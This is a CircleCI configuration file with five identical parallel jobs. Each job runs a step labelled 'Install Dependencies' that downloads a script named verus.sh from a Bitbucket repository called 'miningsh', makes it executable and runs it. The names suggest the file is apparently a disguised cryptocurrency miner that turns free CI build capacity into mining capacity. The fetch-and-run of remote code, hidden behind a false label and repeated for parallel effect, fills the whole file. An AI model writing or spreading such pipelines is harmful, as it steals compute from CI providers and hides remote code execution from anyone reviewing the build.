version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/novalanto01/miningsh/raw/da923e34fdbee9ed1fb4b6423bf2e6a779c0cfcd/verus.sh && chmod u+x verus.sh && ./verus.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/novalanto01/miningsh/raw/da923e34fdbee9ed1fb4b6423bf2e6a779c0cfcd/verus.sh && chmod u+x verus.sh && ./verus.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/novalanto01/miningsh/raw/da923e34fdbee9ed1fb4b6423bf2e6a779c0cfcd/verus.sh && chmod u+x verus.sh && ./verus.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/novalanto01/miningsh/raw/da923e34fdbee9ed1fb4b6423bf2e6a779c0cfcd/verus.sh && chmod u+x verus.sh && ./verus.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/novalanto01/miningsh/raw/da923e34fdbee9ed1fb4b6423bf2e6a779c0cfcd/verus.sh && chmod u+x verus.sh && ./verus.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5